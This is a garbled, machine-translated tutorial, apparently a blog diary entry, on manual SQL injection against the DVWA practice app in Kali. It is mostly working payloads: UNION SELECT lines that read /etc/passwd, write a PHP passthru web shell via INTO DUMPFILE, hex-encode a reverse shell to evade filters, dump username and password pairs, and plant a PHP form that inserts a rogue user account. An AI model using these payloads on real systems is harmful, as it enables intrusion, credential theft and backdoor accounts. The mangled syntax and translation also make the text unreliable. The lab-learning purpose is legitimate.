SQL Manual Injection
1. Read the file "Load_file function"
' Union SELECT NULL,load_file('/etc/passwd ')--+
Burpsuite
2. Writing Files
' Union select NULL,' <?php passthru ($_get[' cmd ');?> " into DumpFile"/var/www/a.php "--+" write a trojan; into D Umpling:mysql function, the input is downloaded in the database "
# # #此语句往往会提示无法写入, because of a lack of permissions "to run MySQL's account to gain access to your own body"
' Union select NULL, ' <?php passthru ($_get[' cmd ');?> "into DumpFile ' a.php '--+ ' writes it to the default path (using single quotation marks):/var/lib/mysq L/dvwa/a.php (Dvwa's account) "
You can use a file inclusion vulnerability when writing to a file #当无权限进行 the specified directory
First, write to the Universal directory/tmp/, and then combine the file Containment vulnerability
' Union select NULL, ' <?php passthru ($_get[' cmd ');?> "into DumpFile"/tmp/a.php "--+
#也可上传反弹shell
Note: the "<", "?", "PHP", ">" characters may trigger the filtering mechanism when the Web Trojan is injected via a URL, so you should use the encoding bypass
# # #将网页木马编译成binaries , the database converts it to PHP code storage using into dumpling
Copy Bounce Shell
Modify Bounce Shellip
Coding
Cat b.php | Xxd-ps "Xxd:linux integration, 16 Binary Editor viewer;-ps: Show encoded Content"
#16进制存在换行符, we need to tidy up and add a layer of piping.
Cat b.php | Xxd-ps | Tr-d ' \ n ' "tr-d: Delete"
Then replace the encoded ciphertext with the plaintext
(0x ciphertext)
3. Save the Download number "Drag library"
' Union select NULL, CONCAT (User,0x3a,password) from the users into OUTFILE '/tmp/a.db '--+
#若没有文件包含之类的漏洞可以下载拖库文件, by limiting the number of queries, step-by-step replication of the paste for data theft
when uploading Webshell cannot achieve the purpose of the operation, can write server-side code, for their own use
#对目标有足够了解, database structure, table structure, programming logic method
Create a form, insert an account into the user's account database "because it is difficult to decipher the encrypted content of the database", the equivalent of developing a function
' Union select NULL, ' <?php if (isset ($_post["Submit")) {$userID = $_post["UserID"]; $first _name
= $_post["First_Name"]; $last _name = $_post["last_name"]; $username =
$_post["username"]; $avatar = $_post["Avatar"]; echo "UserID: $userID <BR>"; Echo
"First_Name: $first _name<br>"; echo "last_name: $last _name<br>"; echo "Username:
$username <BR> "; echo "Avatar:$avatar<BR> ";
$con =mysqli_connect ("127.0.0.1", "Root", "" "," Dvwa "); if (Mysqli_connect_errno ()) {echo
"Failed to connect to MySQL:". Mysqli_connect_error (); } else {echo "Connected to
Database<br> "; }$password = "123"; $sql = "INSERT into dvwa.users values (\ \" $userID \ \ ", \
\ "$first _name\\", \ \ "$last _name\\", \ \ "$username \", MD5 (\ \ "$password \"), \ \ "$avatar \
\")"; if (Mysqli_query ($con, $sql)) {echo "[successful insertion]: $sql";} else {echo "Error
Creating database: ". Mysqli_error ($con); } mysqli_close ($con); }?> <form method= "POST"
action= "<?php echo $_server[" php_self "]?>" > <input type= "text" Name= "UserID"
Value= "><br> <input type=" text "name=" first_name "value=" FH "><br> <input type=" text "
Name= "last_name" value= "y" ><br> <input type= "text" name= "username" value= "YFH" ><br>
<input type= "text" name= "Avatar" value= "yfh!" ><br> <input type= "Submit" name= "Submit"
Value= "Submit Form" ><br> </form> ' into DumpFile '/tmp/user.php '--
Small white diary 40:kali Penetration Testing Web infiltration-sql Manual Injection (ii)-read files, write files, bounce shell